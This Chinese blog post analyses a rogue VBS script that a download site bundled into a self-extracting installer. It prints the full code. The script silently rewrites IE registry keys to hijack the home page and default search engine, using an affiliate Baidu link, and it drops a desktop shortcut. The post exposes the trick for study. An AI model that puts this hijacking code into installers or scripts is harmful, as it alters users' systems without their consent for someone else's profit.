一个不太道德的下载站放在安装包中劫持 IE 主页的代码[VBS]

VBS 脚本文件和正常程序一起打包成自解压 RAR 格式,打开时会首先执行 MS.VBS。
利用 WScript.Shell 写入注册表修改 IE 主页为 www. 2223 .cn;修改 IE 搜索引擎为 baidu .com/s?tn=youxiawang_pg& 形式;桌面生成一个网页快捷方式“2223网址导航”,其目标为 http://www. 2223 .cn/。

抱着学习的态度看看 MS.VBS 代码
显示被隐藏内容 显示被隐藏内容
DIM AUTO
SET AUTO=CreateObject("WScript.shell")
AUTO.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.2223.cn"
AUTO.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{1541925C-3C2A-462A-8D83-F66ECFE23157}\URL","http://www.baidu.com/s?tn=youxiawang_pg&wd={searchTerms}&cl=3&ie=utf-8"
AUTO.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{1541925C-3C2A-462A-8D83-F66ECFE23157}\DisplayName","百度"
AUTO.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\DefaultScope","{1541925C-3C2A-462A-8D83-F66ECFE23157}"
set objShell = WScript.CreateObject("WScript.Shell")
strDesktop = objShell.SpecialFolders.Item("Desktop")
set objLink = objShell.CreateShortcut(strDesktop & "\2223网址导航.lnk")
objLink.TargetPath = "C:\Program Files\Internet Explorer\iexplore.exe"
objLink.Arguments = "http://www.2223.cn/"
objLink.Save
wscript.quit
隐藏内容 隐藏内容
该内容已经被作者隐藏,只有会员才允许查阅 登录 | 注册
[本日志由 parno 于 2010-04-11 08:14 PM 编辑]
上一篇: Flash 图片查看器 FlashPicViewer[SWF][7Z]
下一篇: 完整的《英语口语8000常用语句MP3及文本》[RAR][7Z][DOC][MP3][RM]
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: VBS 流氓软件
相关日志:
评论: 0 | 引用: 0 | 查看次数: 6578
发表评论
昵 称:
密 码: 游客发言不需要密码.
邮 箱: 邮件地址支持Gravatar头像,邮箱地址不会公开.
网 址: 输入网址便于回访.
内 容:
验证码:
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 500 字 | UBB代码 关闭 | [img]标签 关闭